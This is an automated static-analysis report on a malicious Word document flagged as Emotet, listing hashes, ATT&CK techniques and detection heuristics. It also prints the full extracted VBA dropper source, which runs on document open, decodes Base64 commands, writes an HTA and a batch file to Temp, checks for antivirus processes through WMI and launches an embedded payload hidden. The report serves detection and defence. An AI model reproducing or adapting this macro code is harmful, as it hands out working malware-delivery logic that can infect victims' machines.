Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 73d7f5cabfc82d7b…

MALICIOUS

Office (OLE)

223.5 KB Created: 2018-10-29 14:43:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 0b19eede49b4f7d0aff8c6270caa28d3 SHA-1: eede0da5e111bb902a2a478ae45d2d3a85e78ae7 SHA-256: 73d7f5cabfc82d7bd8a54e03ecb51567d81ac5dfa8dc1bd36670daede4e6c482
798 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32 T1059.003 Windows Command Shell T1140 Deobfuscate or Obfuscate T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information

The sample is a malicious Word document containing VBA macros. The Document_Open macro is designed to execute a Base64-decoded shell command, which is 'cmd.exe /c ping localhost -n 100 &&'. This macro also leverages WMI to launch processes and attempts to embed and execute a PE executable. The ClamAV detection and heuristic firings strongly indicate this is a downloader, likely Emotet, used for initial payload delivery.

Heuristics 20

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Downloader.Emotet-10024800-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10024800-0
  • XOR-encoded strings (key 0xEF) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xEF: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly hidden — these bytes score as data, not coherent x86 code (0/1 branch targets land on an instruction boundary (0% coherence)).
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Open Environ("Temp") & "\1.hta" For Output As #1
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8431 bytes
SHA-256: bacb0b4802c953faf24c2bfa7723656ade696af6e53911cfece8e5f278b283d8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


    Selection.MoveDown Unit:=wdScreen, Count:=7
    
    Selection.MoveDown Unit:=wdScreen, Count:=7
    
 Selection.MoveRight Unit:=wdCharacter, Count:=24
 
    Selection.TypeBackspace
    
        Selection.Copy


Call sdfsdf

Call cek


Call killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function


Attribute VB_Name = "bbbbbbb"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "eeeeee"
Sub closee()
  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 15, t)

Dim jddsdfda

jddsdfda = UserForm5.TextBox1.Text
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Dim nuchevi
nuchevi = UserForm6.TextBox1.Text
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In yrtfdsad
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
Dim pipec As Boolean: pipec = True
 
 Dim lhjxvcvx
 lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)
 Dim kap
 kap = x.Name
Dim kkkdds
kkkdds = StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
 
If kap = jddsdfda Then
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, kkkdds
  Print #1, lhjxvcvx
  Close #1
  
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    
   
    If x.Name = "PSUAMain" & nuchevi Then

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
   
       If x.Name = "n360" & nuchevi Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
     If x.Name = "PccNT" & nuchevi Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
        If x.Name = "uiSeAgnt" & nuchevi Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If


     If x.Name = "mbam" & nuchevi Then
     Open Environ("Temp") & "\1s.bat" For Output As #1
  Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
  Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
  Close
  
     Shell Environ("Temp") & "\1s.bat", vbHide


Exit Sub
   End If
   If x.Name = "mbamtray" & nuchevi Then
     Open Environ("Temp") & "\1s.bat" For Output As #1
  Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
  Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
  Close
  
     Shell Environ("Temp") & "\1s.bat", vbHide


Exit Sub
   End If
   

Next




Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("X" & "DYuc" & "Glm"), vbUnicode), vbHide


End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function




Attribute VB_Name = "Aaaaaa"
Sub cek()
 Set D = New DataObject
    D.SetText "  "
    D.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)
End Sub

Attribute VB_Name = "cccccc"

Sub fadf()
kk = ".p" & "if"

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")

FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif"
End Sub

Sub sdfsdf()
ChDir Environ("Temp")
Call kklk
Call fadf

Selection.TypeBackspace


End Sub

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{0609BFE0-13A1-42D9-862F-B8D0813084EF}{F4B5098B-7C44-49CB-BC22-630ED6561953}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{FAF1ABEA-310A-4B71-84A7-7961FCB9BE4B}{F1B6EBB9-28C6-4F2E-9695-EB4E7C2C39AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ddddd"
Sub kklk()
   
 ChDir Environ("Temp")
Dim kk, lll, jgf, tyretw, gdfsfsa

jgf = StrConv(DecodeBase64("ZXhl"), vbUnicode)


kk = ".p" & "if"
lll = "6" & "."
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")


FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf



End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{38581714-50CA-4DE7-9E3E-B90DD8BAA043}{F5F68FD6-D021-4C9B-8D64-19FC7A82946F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{11CB1218-853F-4C2C-AF08-F14AA2CDBD21}{7D1A9A05-224C-4650-A5FE-6176343F3920}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{E3D2233B-77D4-4BC7-86F5-35C2E033DAF3}{D6DABEEC-6521-4AC5-9794-70098E86D1A7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm6"
Attribute VB_Base = "0{08BDF32A-1DBB-41D5-BB7B-8950BD024589}{2DDE070B-868D-4150-977A-ACC46B381360}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
embedded_office_0001465a.exe embedded-pe Office MZ+PE at offset 0x1465A 145318 bytes
SHA-256: 2809951911d9b4dd1e2393bfae8206d34bda4468f26969ca93cbbc923a6cd7cf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1602304139/Ole10Native 82160 bytes
SHA-256: 4ae29f92cdf831237f8cec9934fbb196cdd5d8e883d0eccc934ee3408deaf4d9
ole10native_00_5C.pif ole-package-payload OLE Ole10Native payload: ObjectPool/_1602304139/Ole10Native; display_name=5C.pif; full_path=C:\Users\Admin\AppData\Local\Temp\5C.pif; temp_path=; def_file= 81920 bytes
SHA-256: 846d1e1d019d5bc2a05940b119e19a07643f2e3851184f843960cfd949280894

Open this report in the interactive analyzer, or submit your own file for analysis.